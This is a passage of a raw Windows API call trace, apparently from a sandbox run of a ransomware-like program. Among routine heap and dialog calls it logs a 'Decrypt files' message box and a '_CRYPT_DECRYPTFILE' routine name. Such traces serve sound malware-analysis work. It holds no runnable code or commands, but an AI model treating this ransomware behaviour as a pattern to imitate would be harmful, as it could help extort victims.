hHeap=0xc60000) returned 1 [0254.985] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.985] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.985] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.985] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.985] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.985] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.985] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.985] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.985] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.985] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.985] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.985] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.985] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.985] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.985] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0255.076] MessageBoxW (hWnd=0x0, lpText="Your files will be decrypted if the decryption key was correct", lpCaption="Decrypt files", uType=0x10040) returned 1 [0255.088] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.088] NtdllDialogWndProc_W () returned 0x1 [0255.090] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.090] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.090] NtdllDialogWndProc_W () returned 0x0 [0255.093] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.093] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.093] NtdllDialogWndProc_W () returned 0x0 [0255.098] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.098] NtdllDialogWndProc_W () returned 0x1 [0255.098] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.098] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.099] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.099] SetBkColor (hdc=0x2f0101d9, color=0xf0f0f0) returned 0xffffff [0255.099] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.099] NtdllDialogWndProc_W () returned 0x0 [0255.099] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.099] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.099] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.099] SetBkColor (hdc=0x2f0101d9, color=0xf0f0f0) returned 0xf0f0f0 [0255.099] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.099] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.099] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0255.099] NtdllDialogWndProc_W () returned 0x0 [0255.100] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.100] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.100] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0255.100] NtdllDialogWndProc_W () returned 0x0 [0255.109] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.109] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.109] NtdllDialogWndProc_W () returned 0x0 [0255.186] GetForegroundWindow () returned 0x4014e [0255.186] GetWindowLongW (hWnd=0x4014e, nIndex=-21) returned 8911016 [0255.196] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xefc3d0 [0255.196] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dc0 [0255.196] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ed60) returned 1 [0255.196] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefc3d0 | out: hHeap=0xc60000) returned 1 [0255.196] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0255.196] KillTimer (hWnd=0x30172, uIDEvent=0x1) returned 1 [0255.196] SetTimer (hWnd=0x30172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0255.196] GetForegroundWindow () returned 0x4014e [0255.196] GetWindowLongW (hWnd=0x4014e, nIndex=-21) returned 8911016 [0255.240] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.240] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.240] NtdllDialogWndProc_W () returned 0x0 [0255.243] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.243] NtdllDialogWndProc_W () returned 0x1 [0255.243] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.243] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.243] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.243] SetBkColor (hdc=0x470101d6, color=0xf0f0f0) returned 0xffffff [0255.244] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.244] NtdllDialogWndProc_W () returned 0x0 [0255.244] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.244] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.244] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.244] SetBkColor (hdc=0x470101d6, color=0xf0f0f0) returned 0xf0f0f0 [0255.244] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.244] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.244] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0255.244] NtdllDialogWndProc_W () returned 0x0 [0255.245] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.245] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.245] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0255.245] NtdllDialogWndProc_W () returned 0x0 [0255.245] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.245] NtdllDialogWndProc_W () returned 0x1 [0255.246] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.246] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.246] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.246] SetBkColor (hdc=0x4c0107cd, color=0xf0f0f0) returned 0xffffff [0255.246] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.246] NtdllDialogWndProc_W () returned 0x0 [0255.246] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.246] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.246] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.246] SetBkColor (hdc=0x4c0107cd, color=0xf0f0f0) returned 0xf0f0f0 [0255.246] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.246] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.246] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0255.246] NtdllDialogWndProc_W () returned 0x0 [0255.247] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.247] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.247] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0255.247] NtdllDialogWndProc_W () returned 0x0 [0255.252] GetForegroundWindow () returned 0x4014e [0255.252] GetWindowLongW (hWnd=0x4014e, nIndex=-21) returned 8911016 [0255.298] GetForegroundWindow () returned 0x4014e [0255.298] GetWindowLongW (hWnd=0x4014e, nIndex=-21) returned 8911016 [0255.338] GetForegroundWindow () returned 0x4014e [0255.338] GetWindowLongW (hWnd=0x4014e, nIndex=-21) returned 8911016 [0255.388] GetForegroundWindow () returned 0x4014e [0255.389] GetWindowLongW (hWnd=0x4014e, nIndex=-21) returned 8911016 [0255.408] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.408] NtdllDialogWndProc_W () returned 0x1 [0255.439] GetForegroundWindow () returned 0x4014e [0255.439] GetWindowLongW (hWnd=0x4014e, nIndex=-21) returned 8911016 [0255.472] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.472] NtdllDialogWndProc_W () returned 0x0 [0255.473] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.473] NtdllDialogWndProc_W () returned 0x1 [0255.473] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.473] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.473] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.473] SetBkColor (hdc=0x23010712, color=0xf0f0f0) returned 0xf0f0f0 [0255.475] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.475] NtdllDialogWndProc_W () returned 0x0 [0255.476] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.476] NtdllDialogWndProc_W () returned 0x0 [0255.477] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.477] NtdllDialogWndProc_W () returned 0x1 [0255.477] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.477] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.477] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.477] SetBkColor (hdc=0x23010712, color=0xf0f0f0) returned 0xf0f0f0 [0255.478] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.478] NtdllDialogWndProc_W () returned 0x0 [0255.478] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.478] NtdllDialogWndProc_W () returned 0x0 [0255.478] NtdllDefWindowProc_W () returned 0x0 [0255.478] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.478] NtdllDialogWndProc_W () returned 0x1 [0255.480] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.480] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.480] NtdllDialogWndProc_W () returned 0x0 [0255.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0255.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0255.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aef8 | out: hHeap=0xc60000) returned 1 [0255.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b360 | out: hHeap=0xc60000) returned 1 [0255.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d68 | out: hHeap=0xc60000) returned 1 [0255.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xc60000) returned 1 [0255.482] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.482] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.482] TranslateMessage (lpMsg=0x87fa94) returned 0 [0255.482] DispatchMessageW (lpMsg=0x87fa94) returned 0x0 [0255.482] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.482] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.482] TranslateMessage (lpMsg=0x87fa94) returned 0 [0255.482] DispatchMessageW (lpMsg=0x87fa94) returned 0x0 [0255.483] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.483] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.483] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.483] NtdllDialogWndProc_W () returned 0x0 [0255.483] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.483] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0255.486] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.487] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.487] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0255.487] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.487] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.487] BeginPaint (in: hWnd=0x50150, lpPaint=0x87f788 | out: lpPaint=0x87f788) returned 0x23010712 [0255.487] EndPaint (hWnd=0x50150, lpPaint=0x87f788) returned 1 [0255.487] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.487] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.487] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0255.488] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.488] NtdllDialogWndProc_W () returned 0x1 [0255.488] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.488] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.488] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.488] SetBkColor (hdc=0x4c0107cd, color=0xf0f0f0) returned 0xf0f0f0 [0255.488] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.488] NtdllDialogWndProc_W () returned 0x0 [0255.488] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.488] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.488] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.488] SetBkColor (hdc=0x4c0107cd, color=0xf0f0f0) returned 0xf0f0f0 [0255.489] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.489] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.489] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0255.489] NtdllDialogWndProc_W () returned 0x0 [0255.489] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.489] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.489] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0255.489] NtdllDialogWndProc_W () returned 0x0 [0255.524] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.524] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.524] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0255.525] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.525] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.525] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0255.525] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0255.525] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.525] SetTextColor (hdc=0xd010720, color=0xff00) returned 0x0 [0255.525] SetBkColor (hdc=0xd010720, color=0x0) returned 0xffffff [0255.525] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.525] NtdllDialogWndProc_W () returned 0x1 [0255.525] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.525] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.526] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.526] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0x0 [0255.526] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.527] NtdllDialogWndProc_W () returned 0x0 [0255.528] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.528] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.528] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0255.528] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0255.528] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.528] SetTextColor (hdc=0xd010720, color=0xff00) returned 0x0 [0255.528] SetBkColor (hdc=0xd010720, color=0x0) returned 0xffffff [0255.528] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.528] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.528] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0255.528] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0255.528] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.528] SetTextColor (hdc=0xd010720, color=0xff00) returned 0xff00 [0255.528] SetBkColor (hdc=0xd010720, color=0x0) returned 0x0 [0255.528] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.529] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.529] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0255.529] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0255.529] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.529] SetTextColor (hdc=0xd010720, color=0xff00) returned 0xff00 [0255.529] SetBkColor (hdc=0xd010720, color=0x0) returned 0x0 [0255.529] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.529] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.529] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0255.529] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.529] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.529] GetWindowLongW (hWnd=0x400a2, nIndex=-21) returned 6 [0255.530] GetWindowLongW (hWnd=0x400a2, nIndex=-21) returned 6 [0255.530] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.530] GetWindowLongW (hWnd=0x400a2, nIndex=-16) returned 1342242944 [0255.530] GetSysColor (nIndex=5) returned 0xffffff [0255.530] GetSysColor (nIndex=8) returned 0x0 [0255.530] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0255.530] SetBkColor (hdc=0x43010772, color=0xffffff) returned 0xffffff [0255.530] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.530] NtdllDialogWndProc_W () returned 0x1 [0255.530] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.530] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.530] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.530] SetBkColor (hdc=0x320101d9, color=0xf0f0f0) returned 0xffffff [0255.531] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.531] NtdllDialogWndProc_W () returned 0x0 [0255.532] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.532] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.532] GetWindowLongW (hWnd=0x400a2, nIndex=-21) returned 6 [0255.532] GetWindowLongW (hWnd=0x400a2, nIndex=-21) returned 6 [0255.532] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.532] GetWindowLongW (hWnd=0x400a2, nIndex=-16) returned 1342242944 [0255.532] GetSysColor (nIndex=5) returned 0xffffff [0255.532] GetSysColor (nIndex=8) returned 0x0 [0255.532] SetTextColor (hdc=0x330101d9, color=0x0) returned 0x0 [0255.532] SetBkColor (hdc=0x330101d9, color=0xffffff) returned 0xffffff [0255.533] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.533] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.533] TranslateMessage (lpMsg=0x87fa94) returned 0 [0255.533] DispatchMessageW (lpMsg=0x87fa94) returned 0x0 [0255.533] GetForegroundWindow () returned 0x50150 [0255.533] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.533] GetCursorPos (in: lpPoint=0x87f8d0 | out: lpPoint=0x87f8d0*(x=883, y=499)) returned 1 [0255.533] ScreenToClient (in: hWnd=0x50150, lpPoint=0x87f8d0 | out: lpPoint=0x87f8d0) returned 1 [0255.533] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe97920 [0255.534] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d68 [0255.534] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dc0 [0255.534] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4ca0 [0255.534] GetAsyncKeyState (vKey=1) returned 1 [0255.534] GetAsyncKeyState (vKey=2) returned 0 [0255.534] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.534] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.534] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0255.534] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.534] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.534] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0255.535] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0255.535] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4cd0 [0255.535] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed2d48 [0255.535] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0255.535] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2d48 | out: hHeap=0xc60000) returned 1 [0255.535] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0255.535] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4f8 [0255.535] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed4cd0 [0255.535] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec688 [0255.535] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b360 [0255.535] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4d90 [0255.536] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aef8 [0255.536] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c90 [0255.536] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec2028 [0255.536] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0255.536] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c80 [0255.536] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed2d48 [0255.537] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0255.537] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0255.537] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xcc2c80 [0255.537] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2d48 | out: hHeap=0xc60000) returned 1 [0255.537] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0255.537] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0255.537] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0255.537] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0255.537] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c90 | out: hHeap=0xc60000) returned 1 [0255.537] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0255.537] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed4d90 [0255.537] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c90 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c70 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec2028 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ca8 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c60 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed2d48 [0255.538] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ca8 | out: hHeap=0xc60000) returned 1 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ca8 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xcc2d08 [0255.538] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2d48 | out: hHeap=0xc60000) returned 1 [0255.538] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ca8 | out: hHeap=0xc60000) returned 1 [0255.538] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0255.538] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c70 | out: hHeap=0xc60000) returned 1 [0255.538] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c90 | out: hHeap=0xc60000) returned 1 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed4c90 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ca8 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c70 [0255.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec3b8 [0255.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b120 [0255.539] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c50 [0255.539] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c50 | out: hHeap=0xc60000) returned 1 [0255.539] SendMessageW (hWnd=0x400a2, Msg=0xe, wParam=0x0, lParam=0x0) returned 